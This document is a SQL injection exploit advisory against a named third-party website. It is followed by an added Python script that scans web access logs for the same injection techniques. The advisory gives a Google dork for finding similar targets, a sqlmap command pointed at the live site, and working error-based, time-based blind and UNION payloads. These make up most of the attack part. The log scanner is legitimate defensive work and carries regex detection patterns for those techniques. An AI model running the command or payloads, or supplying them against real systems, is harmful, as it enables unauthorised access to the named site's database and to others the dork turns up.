****************************
#Exploit Title: DESIGNINGITALY - SQL Injection vulnerability
#Date: 2020-09-10
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://designingitaly.com
#Google Dork: form.php?id=2
#Tested On: Windows 10
sqlmap:
sqlmap -u "http://designingitaly.com/form.php?id=2" --dbs
Testing Method:
- error-based
- AND/OR time-based blind
- UNION query
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2 AND (SELECT 2610 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(2610=2610,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: id=-4704 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b7a6271,0x595170717477796e4a42716b6a716d524b746f796f63785547786452794845725a624b6263537346,0x716b7a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vVQD
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************
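
A defender-side check for the three techniques listed in the report above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to form.php whose id value is not a plain integer and labels which technique the value resembles. The log lines are constructed samples, the combined log format is an assumption, and the names classify_id, scan and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One signature per technique named in the report (matched after URL decoding).
SIGNATURES = [
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
# Request line of an Apache/nginx combined-format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_id(value):
    """Return the technique labels an id value matches; [] for a plain integer."""
    if re.fullmatch(r"\d+", value):
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(value)]
    return hits or ["non-numeric id"]

def scan(log_lines, path="/form.php"):
    """Return (line_number, labels) for each suspicious id sent to `path`."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        # parse_qs decodes %20 and + so encoded payloads are compared in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            labels = classify_id(value)
            if labels:
                findings.append((number, labels))
    return findings

# Constructed sample log lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Sep/2020:09:58:11 +0000] "GET /form.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Sep/2020:10:00:01 +0000] "GET /form.php?id=2%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Sep/2020:10:00:09 +0000] "GET /form.php?id=2+AND+(SELECT+1+FROM(SELECT+COUNT(*),FLOOR(RAND(0)*2)x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [10/Sep/2020:10:00:15 +0000] "GET /form.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL--%20x HTTP/1.1" 200 5300',
    '198.51.100.9 - - [10/Sep/2020:10:01:30 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}")
```

Because id is expected to be an integer, any value that fails the digits-only check is reported even when no signature matches; the same check belongs in the application in front of a parameterized query.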